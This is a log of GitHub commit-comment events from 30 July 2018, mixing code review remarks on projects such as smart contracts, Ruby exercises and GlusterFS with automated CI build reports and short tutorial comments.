{"id":"8040012237","type":"CommitCommentEvent","actor":{"login":"emptyrivers"},"repo":{"name":"WeakAuras/WeakAuras2"},"payload":{"comment":{"id":29893103,"position":5,"line":572,"path":"WeakAuras/WeakAuras.lua","commit_id":"8a2ae171d90e6985125f28b3035b7e320b1a89ef","created_at":"2018-07-30T20:11:15Z","updated_at":"2018-07-30T20:11:15Z","author_association":"CONTRIBUTOR","body":"tonumber(nil) evaluates to nil"}},"created_at":"2018-07-30T20:11:15Z"}
{"id":"8040013507","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29893109,"position":136,"line":109,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T20:11:28Z","updated_at":"2018-07-30T20:11:28Z","author_association":"NONE","body":"No, this `storage` thing keeps a reference to the storage location. When you say `game.funds`, that's where the `SLOAD` happens.\r\n\r\nSo you have 1 on line 98, 1 on line 108 and 2 on line 109 because `game.funds += game.funds;` is the same as `game.funds = game.funds + game.funds;`"}},"created_at":"2018-07-30T20:11:28Z"}
{"id":"8040014803","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29893112,"position":19,"line":19,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T20:11:43Z","updated_at":"2018-07-30T20:11:43Z","author_association":"NONE","body":"Не совсем понимаю, что тут проверятся. Если мы в вагон вмещающий 10 человек засунем 999, то этот метод все равно отработает и исключение не будет выброшено. Что тут нужно проверять?"}},"created_at":"2018-07-30T20:11:43Z"}
{"id":"8040015258","type":"CommitCommentEvent","actor":{"login":"tri-hoang"},"repo":{"name":"tri-hoang/GetToThe.LinkAsap"},"payload":{"comment":{"id":29893114,"position":null,"line":null,"path":null,"commit_id":"d811adc4ca683b57e736d614c3b95273bbba8b18","created_at":"2018-07-30T20:11:49Z","updated_at":"2018-07-30T20:11:49Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Secure UDP connection between internal services](https://trello.com/c/mpquluvC/9-secure-udp-connection-between-internal-services)"}},"created_at":"2018-07-30T20:11:49Z"}
{"id":"8040016767","type":"CommitCommentEvent","actor":{"login":"dogiex"},"repo":{"name":"dogiex/MIUI-XML-10-FINNISH"},"payload":{"comment":{"id":29893115,"position":null,"line":null,"path":null,"commit_id":"9f15de3da5deb26ef4d50e429238a72a2a9f0332","created_at":"2018-07-30T20:12:07Z","updated_at":"2018-07-30T20:12:07Z","author_association":"OWNER","body":"@Vihru Asensin nyt Cancrolle (Mi 3) MIUI 10 ja jos tarkoitat tietoturvasovelluksen painikkeiden otsikoiden alla olevia tekstejä niin ne ovat jo käännetty, seuraavassa päivityksessä tulevat sitten, ei kerennyt tähän weeklyyn joten issueta turhaa tehdä."}},"created_at":"2018-07-30T20:12:07Z"}
{"id":"8040022053","type":"CommitCommentEvent","actor":{"login":"sylwek1221zk"},"repo":{"name":"pcottle/learnGitBranching"},"payload":{"comment":{"id":29893124,"position":9,"line":73,"path":"src/template.index.html","commit_id":"9a60b082f35d26316ac240934826365b68c6ea53","created_at":"2018-07-30T20:13:13Z","updated_at":"2018-07-30T20:13:13Z","author_association":"NONE","body":"gxzz"}},"created_at":"2018-07-30T20:13:13Z"}
{"id":"8040024595","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29893127,"position":9,"line":9,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/passenger_wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T20:13:44Z","updated_at":"2018-07-30T20:13:44Z","author_association":"NONE","body":"Только метод take_number нигде больше не определен. Что тут должен делать super?"}},"created_at":"2018-07-30T20:13:44Z"}
{"id":"8040025628","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29893130,"position":15,"line":22,"path":"contracts/Splitter.sol","commit_id":"7df467541e113501e1b21b6b40801a2f1ccdf7ef","created_at":"2018-07-30T20:13:57Z","updated_at":"2018-07-30T20:13:57Z","author_association":"NONE","body":"If you remove this `uint value` and replace it with `msg.value` everywhere, do you save gas. I think yes."}},"created_at":"2018-07-30T20:13:57Z"}
{"id":"8040028487","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29893137,"position":null,"line":null,"path":null,"commit_id":"ed0296ce9f0b5bdf4956c5b07a41890161956987","created_at":"2018-07-30T20:14:27Z","updated_at":"2018-07-30T20:14:27Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2991 of 2993 tests passed, 0 test warnings)\n\nMessages:\n\n * 2 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-30T20:14:27Z"}
{"id":"8040028774","type":"CommitCommentEvent","actor":{"login":"mehmetyasararas"},"repo":{"name":"pulkit24/ToME"},"payload":{"comment":{"id":29893138,"position":null,"line":null,"path":null,"commit_id":"98bceec599100a04bb6091bad18c96177caee9ce","created_at":"2018-07-30T20:14:30Z","updated_at":"2018-07-30T20:14:30Z","author_association":"NONE","body":"İt s fine now thank you."}},"created_at":"2018-07-30T20:14:30Z"}
{"id":"8040028888","type":"CommitCommentEvent","actor":{"login":"solardiz"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29893139,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-30T20:14:32Z","updated_at":"2018-07-30T20:14:32Z","author_association":"COLLABORATOR","body":"Isn't this padding performance-critical? If so, I think we should revert and tell gcc not to warn, like magnum said."}},"created_at":"2018-07-30T20:14:32Z"}
{"id":"8040033577","type":"CommitCommentEvent","actor":{"login":"Karlheinzniebuhr"},"repo":{"name":"Karlheinzniebuhr/Scrap.py"},"payload":{"comment":{"id":29893147,"position":null,"line":null,"path":null,"commit_id":"1ba12fdee996fbf7b0cd6964ccad04f147423399","created_at":"2018-07-30T20:15:27Z","updated_at":"2018-07-30T20:15:27Z","author_association":"OWNER","body":"y con este link? https://servicios.set.gov.py/eset-publico/ciudadano/recuperar?cedula=32"}},"created_at":"2018-07-30T20:15:27Z"}
{"id":"8040034025","type":"CommitCommentEvent","actor":{"login":"dogiex"},"repo":{"name":"dogiex/MIUI-XML-10-FINNISH"},"payload":{"comment":{"id":29893149,"position":null,"line":null,"path":null,"commit_id":"9f15de3da5deb26ef4d50e429238a72a2a9f0332","created_at":"2018-07-30T20:15:32Z","updated_at":"2018-07-30T20:15:32Z","author_association":"OWNER","body":"@Vihru \n\nhttps://github.com/dogiex/MIUI-XML-10-FINNISH/commit/3bb5866b8e13584dd432fda50d44e366296e6aa0\n\nTuossa päivityksessä ne käännettiin."}},"created_at":"2018-07-30T20:15:32Z"}
{"id":"8040036971","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29893157,"position":24,"line":24,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T20:16:07Z","updated_at":"2018-07-30T20:16:07Z","author_association":"NONE","body":"А если перевалит за 0? Будем дальше отнимать?"}},"created_at":"2018-07-30T20:16:07Z"}
{"id":"8040040976","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29893167,"position":12,"line":18,"path":"test/account-mgmt.test.js","commit_id":"7df467541e113501e1b21b6b40801a2f1ccdf7ef","created_at":"2018-07-30T20:16:49Z","updated_at":"2018-07-30T20:16:49Z","author_association":"NONE","body":"I think you can get rid of this `ethAmount` variable."}},"created_at":"2018-07-30T20:16:49Z"}
{"id":"8040042257","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29893168,"position":null,"line":null,"path":null,"commit_id":"56ecbd461b43b3ae05292b285a83a88f1a206126","created_at":"2018-07-30T20:17:04Z","updated_at":"2018-07-30T20:17:04Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1041](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1041).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1041-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-30T20:17:04Z"}
{"id":"8040043386","type":"CommitCommentEvent","actor":{"login":"Tassadar2499"},"repo":{"name":"Tassadar2499/SlishRabotat"},"payload":{"comment":{"id":29893171,"position":null,"line":null,"path":null,"commit_id":"29197b663cfa5bf79b16ba9f2cda8c9dade5270c","created_at":"2018-07-30T20:17:17Z","updated_at":"2018-07-30T20:17:17Z","author_association":"OWNER","body":"Ор"}},"created_at":"2018-07-30T20:17:17Z"}
{"id":"8040043708","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":29893172,"position":11,"line":82,"path":"api/src/main/java/org/openmrs/Patient.java","commit_id":"9f2155ce40bf5f0191ffbfd0e7f159dd32e63f21","created_at":"2018-07-30T20:17:19Z","updated_at":"2018-07-30T20:17:19Z","author_association":"MEMBER","body":"How about adding a since annotation?"}},"created_at":"2018-07-30T20:17:19Z"}
{"id":"8040045881","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29893175,"position":37,"line":34,"path":"test/account-mgmt.test.js","commit_id":"7df467541e113501e1b21b6b40801a2f1ccdf7ef","created_at":"2018-07-30T20:17:43Z","updated_at":"2018-07-30T20:17:43Z","author_association":"NONE","body":"Again, hard to figure out if there is a bug. Use instead:\r\n\r\n```javascript\r\nconst weiAmount = Web3Utils.toWei(new BigNumber(1), 'ether').plus(1);\r\n```"}},"created_at":"2018-07-30T20:17:43Z"}
{"id":"8040046194","type":"CommitCommentEvent","actor":{"login":"NoNameAA"},"repo":{"name":"NoNameAA/CMPT353-Movies-Prediction-and-Analysis-Project"},"payload":{"comment":{"id":29893176,"position":null,"line":null,"path":null,"commit_id":"b910364021c535770a6d6fc21ee126e0208bb6e5","created_at":"2018-07-30T20:17:47Z","updated_at":"2018-07-30T20:17:47Z","author_association":"OWNER","body":"Commit by Shelly"}},"created_at":"2018-07-30T20:17:47Z"}
{"id":"8040085151","type":"CommitCommentEvent","actor":{"login":"EugeniaM"},"repo":{"name":"ViktoriiaHryshko/AngularMP"},"payload":{"comment":{"id":29893308,"position":83,"line":118,"path":"src/app/features/course-list/course-list/course-list.component.ts","commit_id":"0a8c9da57266feb9a9ade01bb4fb14afbdb01aec","created_at":"2018-07-30T20:25:33Z","updated_at":"2018-07-30T20:25:33Z","author_association":"NONE","body":"`removeMe` also should be renamed. Not clear what ''Me'' means "}},"created_at":"2018-07-30T20:25:33Z"}
{"id":"8040089498","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29893321,"position":null,"line":null,"path":null,"commit_id":"b28daaec88a3607b92479984d6d009875f99ff3e","created_at":"2018-07-30T20:26:25Z","updated_at":"2018-07-30T20:26:25Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 566](https://ci.hashicorp.engineering/viewLog.html?buildId=107761&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-30T20:26:25Z"}
{"id":"8040090914","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29893329,"position":null,"line":null,"path":null,"commit_id":"b28daaec88a3607b92479984d6d009875f99ff3e","created_at":"2018-07-30T20:26:41Z","updated_at":"2018-07-30T20:26:41Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 566](https://ci.hashicorp.engineering/viewLog.html?buildId=107761&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:16"}},"created_at":"2018-07-30T20:26:41Z"}
{"id":"8040090918","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29893330,"position":null,"line":null,"path":null,"commit_id":"c49c24919c5083bc45a4d18ebf5a8da158a1420a","created_at":"2018-07-30T20:26:42Z","updated_at":"2018-07-30T20:26:42Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 567](https://ci.hashicorp.engineering/viewLog.html?buildId=107762&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-30T20:26:42Z"}
{"id":"8040091948","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29893331,"position":null,"line":null,"path":null,"commit_id":"c49c24919c5083bc45a4d18ebf5a8da158a1420a","created_at":"2018-07-30T20:26:54Z","updated_at":"2018-07-30T20:26:54Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 567](https://ci.hashicorp.engineering/viewLog.html?buildId=107762&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:12"}},"created_at":"2018-07-30T20:26:54Z"}
{"id":"8040095639","type":"CommitCommentEvent","actor":{"login":"ManishNetam"},"repo":{"name":"ManishNetam/Indian"},"payload":{"comment":{"id":29893337,"position":null,"line":null,"path":null,"commit_id":"332f39c87c28fba5e0025f72e9ac71dd6e33bad9","created_at":"2018-07-30T20:27:36Z","updated_at":"2018-07-30T20:27:36Z","author_association":"OWNER","body":"![picsart_07-29-09 54 30](https://user-images.githubusercontent.com/39300538/43421654-f9fe9bce-9464-11e8-8cec-846f4b47c440.png)\r\nMy picture "}},"created_at":"2018-07-30T20:27:36Z"}
{"id":"8040105112","type":"CommitCommentEvent","actor":{"login":"barseghyanartur"},"repo":{"name":"HiddenClever/django-fobi"},"payload":{"comment":{"id":29893364,"position":5,"line":48,"path":"src/fobi/base.py","commit_id":"ed9d89335ddd0275ad88a9179dd10e23e54509aa","created_at":"2018-07-30T20:29:29Z","updated_at":"2018-07-30T20:29:29Z","author_association":"NONE","body":"I really recommend you to update your fork with latest stable branch (0.13.x)."}},"created_at":"2018-07-30T20:29:29Z"}
{"id":"8040108420","type":"CommitCommentEvent","actor":{"login":"mirandali17"},"repo":{"name":"mirandali17/website"},"payload":{"comment":{"id":29893370,"position":3,"line":5,"path":"README.md","commit_id":"0d5a0e3c9738c06d02b70a445ed189e2c6ba3162","created_at":"2018-07-30T20:30:08Z","updated_at":"2018-07-30T20:30:08Z","author_association":"OWNER","body":"what diff"}},"created_at":"2018-07-30T20:30:08Z"}
{"id":"8040109070","type":"CommitCommentEvent","actor":{"login":"CamSoper"},"repo":{"name":"BethMassi/azure-docs"},"payload":{"comment":{"id":29893373,"position":null,"line":null,"path":null,"commit_id":"3004f4e60cc53879a418c9d714703fb5ff23bd0d","created_at":"2018-07-30T20:30:15Z","updated_at":"2018-07-30T20:30:15Z","author_association":"NONE","body":"I was out last week - Have you submitted a PR with this change? Or would you like me to take care of it?"}},"created_at":"2018-07-30T20:30:15Z"}
{"id":"8040110262","type":"CommitCommentEvent","actor":{"login":"mirandali17"},"repo":{"name":"mirandali17/website"},"payload":{"comment":{"id":29893379,"position":null,"line":null,"path":null,"commit_id":"0d5a0e3c9738c06d02b70a445ed189e2c6ba3162","created_at":"2018-07-30T20:30:29Z","updated_at":"2018-07-30T20:30:29Z","author_association":"OWNER","body":"update repository purpose"}},"created_at":"2018-07-30T20:30:29Z"}
{"id":"8040113493","type":"CommitCommentEvent","actor":{"login":"nixpanic"},"repo":{"name":"raghavendrabhat/glusterfs"},"payload":{"comment":{"id":29893387,"position":7,"line":5920,"path":"xlators/cluster/dht/src/dht-common.c","commit_id":"7c7fd8ddce8f5da752edb39c9a0b78e6b7facfca","created_at":"2018-07-30T20:31:08Z","updated_at":"2018-07-30T20:31:08Z","author_association":"NONE","body":"Instead of implementing this as a `setxattr` call, I would prefer to have a new FOP similar to the `copy_file_range` syscall. Until FUSE support for `copy_file_range` lands in the kernel or our `fuse-bride.c`, a translation from a `setxattr` calll to the `copy_file_range` FOP could be done insize the FUSE mount process. This makes it possible for gfapi to implement a `glfs_copy_file_range()` function that closely matches the syscall.\r\n\r\nAs an extension, we could even think of passing (currently defined as `0`) `flags` that influence the behaviour of the FOP (call `copy_file_range()` on the brick, do a full-copy, ...).\r\n\r\nI really like to stick to standardized interfaces/APIs as much as it is available already."}},"created_at":"2018-07-30T20:31:08Z"}
{"id":"8040114075","type":"CommitCommentEvent","actor":{"login":"liz-fernandez"},"repo":{"name":"liz-fernandez/planets_3"},"payload":{"comment":{"id":29893388,"position":null,"line":null,"path":null,"commit_id":"1fb1276a4881917bbb36f1090116cde96b928e21","created_at":"2018-07-30T20:31:14Z","updated_at":"2018-07-30T20:31:14Z","author_association":"OWNER","body":"I do not agree with this statement. "}},"created_at":"2018-07-30T20:31:14Z"}
{"id":"8040114299","type":"CommitCommentEvent","actor":{"login":"tandraschko"},"repo":{"name":"primefaces/primefaces"},"payload":{"comment":{"id":29893389,"position":null,"line":null,"path":null,"commit_id":"43bb450d3bc638400a42aa9b225032dbd4725c7f","created_at":"2018-07-30T20:31:17Z","updated_at":"2018-07-30T20:31:17Z","author_association":"MEMBER","body":"Why do we need requestMap.put(var, object) in all cases now?"}},"created_at":"2018-07-30T20:31:17Z"}
{"id":"8040115909","type":"CommitCommentEvent","actor":{"login":"Laura-Gomez"},"repo":{"name":"Laura-Gomez/planets"},"payload":{"comment":{"id":29893396,"position":null,"line":null,"path":null,"commit_id":"f81385a9f95aa2262d6f026958a6c695b28297ca","created_at":"2018-07-30T20:31:37Z","updated_at":"2018-07-30T20:31:37Z","author_association":"OWNER","body":"I do not agree with this statement"}},"created_at":"2018-07-30T20:31:37Z"}
{"id":"8040116998","type":"CommitCommentEvent","actor":{"login":"farcosh"},"repo":{"name":"farcosh/planets"},"payload":{"comment":{"id":29893400,"position":null,"line":null,"path":null,"commit_id":"6f765a333e1e1fbcdfa24999071e48059a1e6fb1","created_at":"2018-07-30T20:31:49Z","updated_at":"2018-07-30T20:31:49Z","author_association":"OWNER","body":"I think is not that high...?"}},"created_at":"2018-07-30T20:31:49Z"}
{"id":"8040118136","type":"CommitCommentEvent","actor":{"login":"semiramisCJ"},"repo":{"name":"semiramisCJ/planets"},"payload":{"comment":{"id":29893402,"position":null,"line":null,"path":null,"commit_id":"e54fa7c053c74dcc0c0ffb96b1dc3c773e90bb6b","created_at":"2018-07-30T20:32:02Z","updated_at":"2018-07-30T20:32:02Z","author_association":"OWNER","body":"Very, very big!!"}},"created_at":"2018-07-30T20:32:02Z"}
{"id":"8040118328","type":"CommitCommentEvent","actor":{"login":"Alterna87"},"repo":{"name":"Alterna87/cdmx-2018-06-bc-core-am-social-network"},"payload":{"comment":{"id":29893403,"position":null,"line":null,"path":null,"commit_id":"93c0bb6b30c7c905fb2537a74d9737bec9934385","created_at":"2018-07-30T20:32:05Z","updated_at":"2018-07-30T20:32:05Z","author_association":"OWNER","body":"Add Desing"}},"created_at":"2018-07-30T20:32:05Z"}
{"id":"8040118372","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"mellery451/rippled"},"payload":{"comment":{"id":29893404,"position":null,"line":null,"path":null,"commit_id":"52bdb843c681341e4102cf09624eef62058bab1f","created_at":"2018-07-30T20:32:05Z","updated_at":"2018-07-30T20:32:05Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/mellery451/rippled/commit/52bdb843c681341e4102cf09624eef62058bab1f)\n\nBuilt at __20180730 - 20:32:05__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/gcc.Debug_Dcoverage_ON.txt) | no test results, t: 4s | FAIL :red_circle: \ndocs | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | no test results, t: 22s | FAIL :red_circle: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 276s | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/gcc.Debug.txt) | no test results, t: 4s | FAIL :red_circle: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/gcc.Debug_Dunity_OFF.txt) | no test results, t: 4s | FAIL :red_circle: \nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 570s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 396s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 729s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/gcc.Release_Dassert_ON.txt) | no test results, t: 23s | FAIL :red_circle: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/gcc.Debug_Dstatic_OFF.txt) | no test results, t: 3s | FAIL :red_circle: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | no test results, t: 4s | FAIL :red_circle: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/gcc.Debug_NINJA_BUILD_true.txt) | no test results, t: 36s | FAIL :red_circle: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 588s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 1113s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 1199s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1202s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-nsc-werr/1//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 420s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-30T20:32:05Z"}
{"id":"8040119190","type":"CommitCommentEvent","actor":{"login":"Marisol-AMtz"},"repo":{"name":"Marisol-AMtz/planets"},"payload":{"comment":{"id":29893406,"position":null,"line":null,"path":null,"commit_id":"592a91f16dbd9069b222c833cfee7947ffc129e5","created_at":"2018-07-30T20:32:15Z","updated_at":"2018-07-30T20:32:15Z","author_association":"OWNER","body":"Thanks for the file."}},"created_at":"2018-07-30T20:32:15Z"}
{"id":"8040120071","type":"CommitCommentEvent","actor":{"login":"pbtobi"},"repo":{"name":"pbtobi/planets"},"payload":{"comment":{"id":29893407,"position":null,"line":null,"path":null,"commit_id":"e3940851b22f738776b503530222d2adf53f43ad","created_at":"2018-07-30T20:32:25Z","updated_at":"2018-07-30T20:32:25Z","author_association":"OWNER","body":"Excelente!!"}},"created_at":"2018-07-30T20:32:25Z"}
{"id":"8040120835","type":"CommitCommentEvent","actor":{"login":"bernsmq"},"repo":{"name":"bernsmq/planets"},"payload":{"comment":{"id":29893410,"position":null,"line":null,"path":null,"commit_id":"c1c8eb0a7287fbd737a2f94fad8d4dd928d523e4","created_at":"2018-07-30T20:32:35Z","updated_at":"2018-07-30T20:32:35Z","author_association":"OWNER","body":"Yes it is! And a big one too."}},"created_at":"2018-07-30T20:32:35Z"}
{"id":"8040121733","type":"CommitCommentEvent","actor":{"login":"josschavezf"},"repo":{"name":"josschavezf/planets"},"payload":{"comment":{"id":29893418,"position":null,"line":null,"path":null,"commit_id":"e0a8e7893a1cec283207743e9ef7ddbe380b7d7b","created_at":"2018-07-30T20:32:45Z","updated_at":"2018-07-30T20:32:45Z","author_association":"OWNER","body":"Get out of there!!"}},"created_at":"2018-07-30T20:32:45Z"}
{"id":"8040122642","type":"CommitCommentEvent","actor":{"login":"Yinaniy"},"repo":{"name":"Yinaniy/planets"},"payload":{"comment":{"id":29893422,"position":null,"line":null,"path":null,"commit_id":"7852e9075c5a12ecd9c861bfb3696cef9b906e34","created_at":"2018-07-30T20:32:58Z","updated_at":"2018-07-30T20:32:58Z","author_association":"OWNER","body":"Este es un comentario sobre prueba"}},"created_at":"2018-07-30T20:32:58Z"}
{"id":"8040124376","type":"CommitCommentEvent","actor":{"login":"carob11"},"repo":{"name":"carob11/planets"},"payload":{"comment":{"id":29893425,"position":null,"line":null,"path":null,"commit_id":"ccb898d7315a770676de764fc50d9ca6f0fdc513","created_at":"2018-07-30T20:33:19Z","updated_at":"2018-07-30T20:33:19Z","author_association":"OWNER","body":"this is a comment"}},"created_at":"2018-07-30T20:33:19Z"}
{"id":"8040128824","type":"CommitCommentEvent","actor":{"login":"Tonatiuhxotl"},"repo":{"name":"Tonatiuhxotl/planets"},"payload":{"comment":{"id":29893440,"position":null,"line":null,"path":null,"commit_id":"bcc69e73dad99cfd0c405f0c33590b2c82c15883","created_at":"2018-07-30T20:34:14Z","updated_at":"2018-07-30T20:34:14Z","author_association":"OWNER","body":"Ejemplo comentario"}},"created_at":"2018-07-30T20:34:14Z"}
{"id":"8040129232","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29893442,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T20:34:19Z","updated_at":"2018-07-30T20:34:19Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T20:34:19Z"}
{"id":"8040131400","type":"CommitCommentEvent","actor":{"login":"tiltec"},"repo":{"name":"yunity/yuca"},"payload":{"comment":{"id":29893454,"position":16,"line":69,"path":"roles/karrot-backend/templates/nginx.j2","commit_id":"4da27636a91252fd28b3ad8278ff14950a2b56ec","created_at":"2018-07-30T20:34:43Z","updated_at":"2018-07-30T20:34:43Z","author_association":"MEMBER","body":"I think you didn't intend to do this change..."}},"created_at":"2018-07-30T20:34:43Z"}
